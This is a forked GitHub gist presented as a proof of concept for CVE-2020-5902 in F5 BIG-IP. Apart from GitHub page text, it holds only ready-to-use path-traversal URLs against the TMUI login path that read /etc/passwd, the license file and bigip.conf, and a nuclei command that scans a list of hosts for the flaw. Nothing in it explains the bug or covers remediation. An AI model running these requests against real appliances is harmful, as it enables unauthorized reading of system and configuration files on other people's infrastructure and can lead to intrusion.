vxrv/CVE-2020-5902.md

Forked from cihanmehmet/CVE-2020-5902.md

Created July 5, 2020 21:46

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/vxrv/0de65a650f5d963e7196b340362832e2.js"></script>
Save vxrv/0de65a650f5d963e7196b340362832e2 to your computer and use it in GitHub Desktop.

BIGIP CVE-2020-5902 Exploit POC

Raw

BIGIP CVE-2020-5902 Exploit POC

https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp

https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa

https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment